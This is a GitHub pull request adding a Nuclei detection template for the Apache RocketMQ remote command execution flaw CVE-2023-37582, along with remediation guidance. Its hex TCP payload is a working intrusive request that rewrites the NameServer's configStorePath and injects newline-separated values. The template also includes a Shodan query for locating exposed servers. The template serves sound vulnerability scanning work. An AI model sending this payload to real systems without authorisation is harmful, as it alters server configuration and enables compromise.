Skip to content

Add CVE-2023-37582 (vKEV) #13580

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 3 commits into from
Oct 16, 2025
Merged

Add CVE-2023-37582 (vKEV) #13580

Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
96606f2
Add CVE-2023-37582 (vKEV)
daffainfo Oct 13, 2025
6bf3bb2
Enhance CVE-2023-37582 with impact and remediation
DhiyaneshGeek Oct 13, 2025
60070dc
Update CVE-2023-37582.yaml tags for categorization
DhiyaneshGeek Oct 15, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
50 changes: 50 additions & 0 deletions network/cves/2023/CVE-2023-37582.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
id: CVE-2023-37582

info:
name: Apache RocketMQ - Remote Command Execution
author: daffainfo
severity: critical
description: |
The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.
impact: |
Attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
remediation: |
Upgrade RocketMQ to version 5.1.2 or above for 5.x series, or 4.9.7 or above for 4.x series.
reference:
- http://www.openwall.com/lists/oss-security/2023/07/12/1
- https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
- https://nvd.nist.gov/vuln/detail/CVE-2023-37582
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37582
cwe-id: CWE-94
epss-score: 0.87124
epss-percentile: 0.99392
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: rocketmq
shodan-query: rocketmq port:"9876"
tags: cve,cve2023,apache,rocketmq,network,intrusive,vkev

tcp:
- inputs:
- data: 000000a4000000617b22636f6465223a3331382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430357d636f6e66696753746f7265506174683d2f746d702f70776e65640a70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374
type: hex

host:
- "{{Hostname}}"

port: 9876
read-size: 1024

matchers:
- type: dsl
dsl:
- "contains_all(raw, 'serializeTypeCurrentRPC', 'version')"
- "!contains_any(raw, 'Can not update config','FORBID ACCESS')"
condition: and
Loading